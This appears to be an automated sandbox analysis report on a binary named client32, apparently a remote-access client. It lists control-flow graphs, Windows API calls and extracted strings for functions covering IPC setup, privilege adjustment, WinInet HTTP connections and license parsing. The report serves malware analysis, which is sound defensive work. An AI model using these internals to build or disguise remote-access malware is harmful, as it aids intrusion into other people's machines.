                                                                                                                                                                control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 721 1109e812-1109e82d call 11161d01 720->721 728 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->728 729 1109e805-1109e80b call 1109d4d0 726->729 730 1109e316-1109e33b CreateFileMappingA 727->730 733 1109e2fa-1109e310 728->733 734 1109e273-1109e29e call 1109d3a0 call 1109d3f0 728->734 729->720 731 1109e388-1109e39b GetLastError 730->731 732 1109e33d-1109e35d GetLastError call 1112ef20 730->732 738 1109e39d 731->738 739 1109e3a2-1109e3b9 MapViewOfFile 731->739 747 1109e368-1109e370 732->747 748 1109e35f-1109e366 LocalFree 732->748 733->730 758 1109e2e9-1109e2f1 734->758 759 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 734->759 738->739 740 1109e3bb-1109e3d6 call 1112ef20 739->740 741 1109e3f7-1109e3ff 739->741 761 1109e3d8-1109e3d9 LocalFree 740->761 762 1109e3db-1109e3e3 740->762 745 1109e4a1-1109e4b3 741->745 746 1109e405-1109e41e GetModuleFileNameA 741->746 751 1109e4f9-1109e512 call 11161d20 GetTickCount 745->751 752 1109e4b5-1109e4b8 745->752 753 1109e4bd-1109e4d8 call 1112ef20 746->753 754 1109e424-1109e42d 746->754 755 1109e372-1109e373 LocalFree 747->755 756 1109e375-1109e37f 747->756 748->747 777 1109e514-1109e519 751->777 763 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 752->763 781 1109e4da-1109e4db LocalFree 753->781 782 1109e4dd-1109e4e5 753->782 754->753 764 1109e433-1109e436 754->764 755->756 766 1109e7fe-1109e800 call 1109d8c0 756->766 758->733 768 1109e2f3-1109e2f4 FreeLibrary 758->768 759->758 767 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 759->767 761->762 770 1109e3e8-1109e3f2 762->770 771 1109e3e5-1109e3e6 LocalFree 762->771 788 1109e60b-1109e622 CreateEventA 763->788 789 1109e605 763->789 773 1109e479-1109e49c call 1112ef20 call 1109d8c0 764->773 774 1109e438-1109e43c 764->774 766->729 767->758 768->733 770->766 771->770 773->745 774->773 780 1109e43e-1109e449 774->780 785 1109e51b-1109e52a 777->785 786 1109e52c 777->786 790 1109e450-1109e454 780->790 781->782 783 1109e4ea-1109e4f4 782->783 784 1109e4e7-1109e4e8 LocalFree 782->784 783->766 784->783 785->777 785->786 793 1109e52e-1109e534 786->793 791 1109e624-1109e643 GetLastError * 2 call 1112ef20 788->791 792 1109e646-1109e64e 788->792 789->788 795 1109e470-1109e472 790->795 796 1109e456-1109e458 790->796 791->792 800 1109e650 792->800 801 1109e656-1109e667 CreateEventA 792->801 803 1109e545-1109e59d 793->803 804 1109e536-1109e543 793->804 802 1109e475-1109e477 795->802 797 1109e45a-1109e460 796->797 798 1109e46c-1109e46e 796->798 797->795 805 1109e462-1109e46a 797->805 798->802 800->801 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 801->807 808 1109e68b-1109e693 801->808 802->753 802->773 803->763 804->793 804->803 805->790 805->798 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 813 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->813 814 1109e6d1-1109e6d9 810->814 811->810 813->814 815 1109e6db 814->815 816 1109e6e1-1109e6f2 CreateEventA 814->816 815->816 818 1109e714-1109e722 816->818 819 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 816->819 822 1109e724-1109e725 LocalFree 818->822 823 1109e727-1109e72f 818->823 819->818 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 830 1109e74c-1109e74f 827->830 828->766 830->828 832 1109e755-1109e758 830->832 832->828 833 1109e75e-1109e761 832->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->766 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,59FD48C0,00080000,00000000,00000000), ref: 1109D46D
                                                                                                                                                                  • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                                                                                                  • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                                                                                                  • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,59FD48C0,00080000,00000000,00000000), ref: 1109E225
                                                                                                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                                                                                                • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                                                                                                • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                                                                                                • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                                                                                                • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                                                                                                • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                                                                                                • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E33D
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E390
                                                                                                                                                                • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                                                                                                  • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                                                                                                  • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                                                                                                • _memset.LIBCMT ref: 1109E500
                                                                                                                                                                • GetTickCount.KERNEL32 ref: 1109E508
                                                                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E624
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E669
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                                                                                                • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                                                                                                • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                                                                                                • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                                                                                                • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                                                                                                • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                                                                                                • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                                                                                                • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                                                                                                • API String ID: 3291243470-2792520954
                                                                                                                                                                • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                                                                                                • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                                                                                                • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                                                                                                • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51
                                                                                                                                                                Function 11029590 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 853 1102972a-1102972d 851->853 854 1102968b-110296a3 call 11162b51 851->854 855 11029653-1102966a GetProcAddress 852->855 856 1102966c-1102966f 852->856 858 11029748-11029760 InternetOpenA 853->858 859 1102972f-11029746 GetProcAddress 853->859 865 110296c4-110296d0 854->865 866 110296a5-110296be GetProcAddress 854->866 855->856 860 11029671-11029673 SetLastError 855->860 856->851 863 11029784-11029790 call 11162be5 858->863 859->858 862 11029779-11029781 SetLastError 859->862 860->851 862->863 872 11029796-110297c7 call 11142290 call 11164390 863->872 873 11029a0a-11029a14 863->873 871 110296d2-110296db GetLastError 865->871 874 110296f1-110296f3 865->874 866->865 868 11029762-1102976a SetLastError 866->868 868->871 871->874 875 110296dd-110296ef call 11162be5 call 11162b51 871->875 894 110297c9-110297cc 872->894 895 110297cf-110297e4 call 11081a70 * 2 872->895 873->845 877 11029a1a 873->877 879 11029710-1102971c 874->879 880 110296f5-1102970e GetProcAddress 874->880 875->874 882 11029a2c-11029a2f 877->882 879->853 898 1102971e-11029727 879->898 880->879 886 1102976f-11029777 SetLastError 880->886 883 11029a31-11029a36 882->883 884 11029a3b-11029a3e 882->884 890 11029b9f-11029ba7 883->890 891 11029a40-11029a45 884->891 892 11029a4a 884->892 886->853 896 11029bb0-11029bc3 890->896 897 11029ba9-11029baa FreeLibrary 890->897 899 11029b6f-11029b74 891->899 900 11029a4d-11029a55 892->900 894->895 918 110297e6-110297ea 895->918 919 110297ed-110297f9 895->919 897->896 898->853 905 11029b76-11029b8d GetProcAddress 899->905 906 11029b8f-11029b95 899->906 903 11029a57-11029a6e GetProcAddress 900->903 904 11029a74-11029a7d 900->904 903->904 908 11029b2e-11029b30 SetLastError 903->908 912 11029a80-11029a82 904->912 905->906 909 11029b97-11029b99 SetLastError 905->909 906->890 910 11029b36-11029b3d 908->910 909->890 914 11029b4c-11029b6d call 110278a0 * 2 910->914 912->910 916 11029a88-11029a8d 912->916 914->899 916->914 920 11029a93-11029acf call 1110f4a0 call 11027850 916->920 918->919 922 11029824-11029829 919->922 923 110297fb-110297fd 919->923 942 11029ae1-11029ae3 920->942 943 11029ad1-11029ad4 920->943 925 1102982b-1102983c GetProcAddress 922->925 926 1102983e-11029855 InternetConnectA 922->926 928 11029814-1102981a 923->928 929 110297ff-11029812 GetProcAddress 923->929 925->926 931 11029881-1102988c SetLastError 925->931 932 110299f7-11029a07 call 111618c1 926->932 933 1102985b-1102985e 926->933 928->922 929->928 935 1102981c-1102981e SetLastError 929->935 931->932 932->873 938 11029860-11029862 933->938 939 11029899-110298a1 933->939 935->922 944 11029864-11029877 GetProcAddress 938->944 945 11029879-1102987f 938->945 946 110298a3-110298b7 GetProcAddress 939->946 947 110298b9-110298d4 939->947 950 11029ae5 942->950 951 11029aec-11029af1 942->951 943->942 949 11029ad6-11029ada 943->949 944->945 952 11029891-11029893 SetLastError 944->952 945->939 946->947 953 110298d6-110298de SetLastError 946->953 954 110298e1-110298e4 947->954 949->942 955 11029adc 949->955 950->951 956 11029af3-11029b09 call 110d1090 951->956 957 11029b0c-11029b0e 951->957 952->939 953->954 960 110299f2-110299f5 954->960 961 110298ea-110298ef 954->961 955->942 956->957 963 11029b10-11029b12 957->963 964 11029b14-11029b25 call 111618c1 957->964 960->932 967 11029a1c-11029a29 call 111618c1 960->967 965 110298f1-11029908 GetProcAddress 961->965 966 1102990a-11029916 961->966 963->964 969 11029b3f-11029b49 call 111618c1 963->969 964->914 979 11029b27-11029b29 964->979 965->966 971 11029918-11029920 SetLastError 965->971 978 11029922-1102993b GetLastError 966->978 967->882 969->914 971->978 980 11029956-1102996b 978->980 981 1102993d-11029954 GetProcAddress 978->981 979->900 984 11029975-11029983 GetLastError 980->984 981->980 982 1102996d-1102996f SetLastError 981->982 982->984 985 11029985-1102998a 984->985 986 1102998c-11029998 GetDesktopWindow 984->986 985->986 989 110299e2-110299e7 985->989 987 110299b3-110299cf 986->987 988 1102999a-110299b1 GetProcAddress 986->988 987->960 993 110299d1 987->993 988->987 990 110299d6-110299e0 SetLastError 988->990 989->960 991 110299e9-110299ef 989->991 990->960 991->960 993->954
                                                                                                                                                                APIs
                                                                                                                                                                • LoadLibraryA.KERNEL32(WinInet.dll,59FD48C0,757323A0,?,00000000), ref: 110295C5
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                                                                                                • _malloc.LIBCMT ref: 11029697
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                                                                                                • GetLastError.KERNEL32 ref: 110296D2
                                                                                                                                                                • _free.LIBCMT ref: 110296DE
                                                                                                                                                                • _malloc.LIBCMT ref: 110296E7
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                                                                                                • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                                                                                                • _free.LIBCMT ref: 11029785
                                                                                                                                                                  • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                                                                                                  • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                                                                                                • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                                                                                                • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                                                                                                • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                                                                                                • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                                                                                                • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                                                                                                • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                                                                                                • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                                                                                                • API String ID: 921868004-913974648
                                                                                                                                                                • Opcode ID: df85d3a1662e4d01aa062a95c5ecba07d4916ff71ea5790ba3812fcab14611a4
                                                                                                                                                                • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                                                                                                • Opcode Fuzzy Hash: df85d3a1662e4d01aa062a95c5ecba07d4916ff71ea5790ba3812fcab14611a4
                                                                                                                                                                • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                                                                                                Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,02FBB818,000000FF,?), ref: 11144ED5
                                                                                                                                                                  • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02FBB818,000000FF,?), ref: 11144EE5
                                                                                                                                                                • _fgets.LIBCMT ref: 11061DC2
                                                                                                                                                                • _strpbrk.LIBCMT ref: 11061E29
                                                                                                                                                                • _fgets.LIBCMT ref: 11061F2C
                                                                                                                                                                • _strpbrk.LIBCMT ref: 11061FA3
                                                                                                                                                                • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                                                                                                • _fgets.LIBCMT ref: 11062035
                                                                                                                                                                • _strpbrk.LIBCMT ref: 1106205B
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423456809.00000000111F0000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000111F6000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001120A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001125C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.0000000011287000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001129D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112AC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112B3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.00000000112DE000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423537548.000000001132A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_21_2_11000000_client32.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                                                                                                • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                                                                                                • API String ID: 716802716-1571441106
                                                                                                                                                                • Opcode ID: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                                                                                                • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                                                                                                • Opcode Fuzzy Hash: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                                                                                                • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61
                                                                                                                                                                Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1646 11143570-111435b1 GetModuleFileNameA 1647 111435f3 1646->1647 1648 111435b3-111435c6 call 11081b40 1646->1648 1650 111435f9-111435fd 1647->1650 1648->1647 1654 111435c8-111435f1 LoadLibraryA 1648->1654 1652 111435ff-1114360c LoadLibraryA 1650->1652 1653 11143619-11143637 GetModuleHandleA GetProcAddress 1650->1653 1652->1653 1655 1114360e-11143616 LoadLibraryA 1652->1655 1656 11143647-11143670 GetProcAddress * 4 1653->1656 1657 11143639-11143645 1653->1657 1654->1650 1655->1653 1658 11143673-111436eb GetProcAddress * 10 call 11161d01 1656->1658 1657->1658 1660 111436f0-111436f3 1658->1660
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,757323A0), ref: 111435A3
                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                                                                                                • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                                                                                                • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                                                                                                  • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000015.00000002.2419532010.0000000011001000.00000020.00000001.01000000.0000000F.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                • Associated: 00000015.00000002.2419489572.0000000011000000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                • Associated: 00000015.00000002.2423288156.00000000111E1000.00000004.00000001.01000000.0000000F.sdmpDownload File
